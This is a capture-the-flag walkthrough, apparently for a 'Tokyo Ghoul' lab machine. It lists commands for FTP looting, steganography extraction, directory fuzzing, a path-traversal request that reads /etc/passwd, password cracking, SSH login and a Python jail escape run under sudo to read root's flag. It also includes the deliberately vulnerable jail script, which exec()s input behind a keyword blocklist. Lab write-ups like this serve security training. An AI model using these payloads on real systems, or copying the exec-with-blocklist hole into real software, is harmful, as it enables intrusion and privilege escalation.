My attack chain for Tokyo Ghoul. Nice web room that also contains File Analysis and Python jail for PrivEsc.
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
|
ftp $ip
wget recursive
# file analysis part
ghidra
get > kamishiro
steghide extract -sf You_got_1t
# web part
firefox http://$ip$/d1r3c70ry_center/
gobuster dir -u http://$ip/d1r3c70ry_center/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
# Path traversal
ffuf -u "http://$ip/d1r3c70ry_center/claim/index.php?view=FUZZ" -w ../../../dirtraverse.txt -c -of md -o ffudir-traverse.md -x http://127.0.0.1:8080 -fw 42 -fw 40,42
firefox http://$ip/d1r3c70ry_center/claim/index.php?view=/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/%2e%2e/etc/passwd
# hash cracking user: kamishiro
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
# SSH to machine using cracked creds
ssh kamishiro@$ip
# root
sudo -l
#(ALL) /usr/bin/python3 #/home/kamishiro/jail.py
sudo -u root /usr/bin/python3 /home/kamishiro/jail.py
# Hi! Welcome to my world kaneki...
# python injection payload
__builtins__.__dict__['__IMPORT__'.lower()]('OS'.lower()).__dict__['SYSTEM'.lower()]('cat /root/root.txt')
__builtins__.__dict__['__IMPORT__'.lower()]
|
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
|
#! /usr/bin/python3
#-*- coding:utf-8 -*-
def main():
print("Hi! Welcome to my world kaneki")
print("========================================================================")
print("What ? You gonna stand like a chicken ? fight me Kaneki")
text = input('>>> ')
for keyword in ['eval', 'exec', 'import', 'open', 'os', 'read', 'system', 'write']:
if keyword in text:
print("Do you think i will let you do this ??????")
return;
else:
exec(text)
print('No Kaneki you are so dead')
if __name__ == "__main__":
main()
|